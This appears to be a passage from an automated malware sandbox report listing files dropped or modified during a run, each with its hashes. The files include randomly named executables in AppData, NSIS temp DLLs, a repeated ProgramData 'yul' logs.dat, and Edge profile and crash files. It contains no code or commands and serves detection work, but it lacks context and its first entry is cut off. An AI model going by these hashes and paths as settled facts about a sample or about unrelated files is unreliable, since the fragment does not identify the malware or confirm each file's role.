| SHA1 | 10e3d27a6b0ab5cf61dad6cd36aa061674949ac4 |
| SHA256 | feb035cc54e20ef6e16d443740b4b2c486f6f0d1711df7dba1987f968201e3a2 |
| SHA512 | e538fc83d1404ad0acc372427baa0ad9eddf55c379454985304eb8df325cb97ff60196da47d4b072fd1b5337cf08bd8cc6b63341c375a3406db10be066a9a261 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | dd45f09d7950df50662233c432e7a67b |
| SHA1 | a9a08ab552a9acc5947ac538e1c16606df717791 |
| SHA256 | ddee979f85e87f7a075484eab34db857bf60354180be48963549591335eefd9e |
| SHA512 | e11510e94da5af2c8b82e82dc359526f1278de4127e99922de956bc501e0248915f7dafe85263d9c81695c5fdab7f4be5ea8d13cabdbdb097f8e79895d52425b |
C:\Users\Admin\AppData\Local\Temp\nsi164A.tmp\klpaz.dll
| MD5 | 0c7637f6f292ff21c50d3ab536882144 |
| SHA1 | cd913b8ece6f2577eb07bdca61a7346184eb4962 |
| SHA256 | 69b6449b7cc5e34ae8f070d9ca882995248fdf80b583660fcc5a4916d78b1be2 |
| SHA512 | 7919a18357e7a11d0624f6fa8dba9e119119ea28b9843b7ebd32a65f82c2bc990abfae00c778457b7f51e0310c912c0554fe64093093fba90352b9b13b511496 |
C:\Users\Admin\AppData\Local\Temp\nsb1D5F.tmp\mydrvjhyy.dll
| MD5 | 71dd0c9a7ffabfca62ae8820cae0edab |
| SHA1 | efa543dcb10eab21decf8e5c5a71f73a6790e33f |
| SHA256 | b890a728b5ea08fa79b5ab93cfa556ab5100e1da04bd7211fc218a611d5eeb4b |
| SHA512 | c5ff0b3ccf641cd6126a6e1a929d3e6fb927a20319daf5192e26bab75f8ebc5b989d85688f0bc624f20d9b0210a9975308f2fe0cc0d53c8570409ff1bf80f375 |
C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe
| MD5 | cc1813159fd550c85aae1423853f3307 |
| SHA1 | 020f12dd4aa5a90971c350f447cb55a3640052ea |
| SHA256 | 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8 |
| SHA512 | 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GVVED0TI\json[1].json
| MD5 | 149c2823b7eadbfb0a82388a2ab9494f |
| SHA1 | 415fe979ce5fd0064d2557a48745a3ed1a3fbf9c |
| SHA256 | 06fa5d4e7fbfb1efdc19baa034601a894b21cf729785732853ced4bb40aca869 |
| SHA512 | f8fb6b7c93c4ab37f6e250ba8ac5c82f6e17fe52156cab81d34e91107d1da716b744bfe02ee0306497a3876d5352af789a1e66dab10e11e22065bac3050475fe |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dckap5v.t3p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe
| MD5 | 94d7d5f70d6d2ffdafb1bc5971357591 |
| SHA1 | 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937 |
| SHA256 | a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5 |
| SHA512 | f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842 |
C:\ProgramData\yul\logs.dat
| MD5 | a1b6bd2a98f951e5c37e51937f98fa6b |
| SHA1 | 0579fcfef9fd54ee63182e5e6394854c90a3be22 |
| SHA256 | e70c85cdd2c9d7a208542a65c3143530747e785adeb5b3ff892c164224392b63 |
| SHA512 | e641e8b9046b85bb2400c8883c468fcd30b83e3dc5b1219472fd248c6d951d7ef86dc69a63bf120acfe872220411955a6c0d66495a18100402b4f20d3ea704cc |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\ProgramData\yul\logs.dat
| MD5 | b0b45f6d418596b2ab5f132e05cfb376 |
| SHA1 | 961ef514cdd54d6bc110d15f52598738924d4a2a |
| SHA256 | bfd89af438a4d3217fab60f0968b2e48a907149bde21791e3dc291de912e99dc |
| SHA512 | 1e5e3e9ca6aab7c2e8e893fd9477e8dadc254b29eb6c3ebbc604a30d2e2cabc655785b52336435fe33349fbd23957295f417ecde2d428740404ac50685a3ca3b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b950ebe404eda736e529f1b0a975e8db |
| SHA1 | 4d2c020f1aa70e2bcb666a2dd144d1f3588430b8 |
| SHA256 | bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4 |
| SHA512 | 6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9b62544d156bc6b7302664fd5362b679 |
| SHA1 | 360c1a42f2f7d7eba5416b84c505ae4c175bd71a |
| SHA256 | c0a28e342325c08a2a230b552a945d943acd8f964e2c5c9a0cd6994236ca361d |
| SHA512 | 18c34d1aca9339473649948edae27ec65003b7f57a5c5e3aef6af642be4066542a0344702317362da5cd08346db5b37ce7625f1de14dfe35562293f8ccae3bd9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd5bee5b228c95f791498ec97b68bedd |
| SHA1 | 40f2ba525e44b2c255c86ce70bdba39f5055441f |
| SHA256 | 5aea469b4ca99d337284f85a8460338daa883c28a0b5a8a6ea1f67cd11ee0170 |
| SHA512 | a131d6512ec145c7ec3a5a742af5c4195f142c7b8b937c0953056f7c79f3e7ae136fbd12db4a73e0b1b2a30c0a42e682a541646d15ae2b3e40d11196f3f3fca3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e329cc2ec5712aaec3a3fde3b7a622e9 |
| SHA1 | b7df68579017ea07eafa90db5192df1de29758e4 |
| SHA256 | fbbc440416fea58389ccf4e14bfe665223dbb17c744f4d0c56e49eef751cbb5d |
| SHA512 | 945a7a769e52846d4c06cff3064479f742c2a1d329e5f046c8cb59e83f5fa135818cbb131c01868da1e29dc670115009ac7fe443045c7f47530c1fce73bb85f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | ca36933e6dea7aa507a272121b34fdbb |
| SHA1 | 3b4741ca0308b345de5ecf6c3565b1dbacb0fb86 |
| SHA256 | fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d |
| SHA512 | 5a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\54f09ac1-8b24-4a8f-96d4-6acc4f9702d1.dmp
| MD5 | 796c1a70e6f7776a60909fedc56f3a06 |
| SHA1 | ef86a3a85da5d1f9063af289f3e1b35580066544 |
| SHA256 | c7e7bcaead2c9a6ae058aa18a6575a6b6ea8ca74ba567a543d94819d7dab0b91 |
| SHA512 | 9c73f1ad9e60320cd9d85b5a0604b9024be32894065c015fb5b8c438e8a49a185eb48bbd3904aaa5c89325b3cc1709ed670425b08290ea3d4384c34bea9d7a02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 68fa59d779f4eb04d362576c6fb94e2c |
| SHA1 | d5a109ae8016acfd7bb3d65bbc341e4a49124440 |
| SHA256 | e9c61db580d4b5eafb3681cab191093f5f79658f177194b69adfb494be93f9e9 |
| SHA512 | 0169107e26c1c98babd0b4b183f4c6f19963ad49746581bd17dc0da2da49c9799bfbd07330452c04c5ff13755e01a2abf22e6616441732db5ea777f2d19bdd36 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2ef51b0b-cfd8-4053-8a0b-4a347e633aea.dmp
| MD5 | 5fd2eecf02dcf3ddf8aee535c7a1db6a |
| SHA1 | f33a8ae0d5d702a9d514d6c94e6dab44c1e40fbc |
| SHA256 | a0513f0d95a3ac31ee323e6ebc86be968c80ccc422809b6c5b6c2e1f215111ed |
| SHA512 | eb3e0087a78f99f56afb9ef9a2c63f30f2e0e95024454f0d9f44fba10926503953c1520ae1683675551b4adad1d30b2ad1c1fc5ebd1bc373ad8590cc60151d64 |
C:\ProgramData\yul\logs.dat
| MD5 | 2836bcba3c461e607845ae3518136579 |
| SHA1 | 54d2d37cf9065da0f09b69836f6c975f396ec54e |
| SHA256 | 2b719d741defad231508d3130894c3d4ec86c2ed9deed630f60ffdab958d03b8 |
| SHA512 | 27ba541a466ac7e5005d048c803b8ace84447f30a4c567f36f62db2bce3db68fe303f81b2801fded13ae691b3a3d259c7fe3b181935c1b0b0b432862afb42d93 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg
| MD5 | bd74a3c50fd08981e89d96859e176d68 |
| SHA1 | 0a98b96aefe60b96722d587b7c3aabcd15927618 |
| SHA256 | ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837 |
| SHA512 | 0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e |
C:\ProgramData\yul\logs.dat
| MD5 | b97beaf3b95f3b354a19a93bdc36bb1a |
| SHA1 | 587348dc61688a3537711d9af922527b2813b33a |
| SHA256 | 001413fa305b4830a173cdf2ff7eeb26c3615152599aad9c3d01b4011e837469 |
| SHA512 | 1073b1ef95677eaeccedabcb73eaed26fa7240911bc3cd83e440bdf7a59e5b842f29fcb0e7be6a3e726ee099110d33101f8e4d05e9a2eb618e13cf8786fe0ae0 |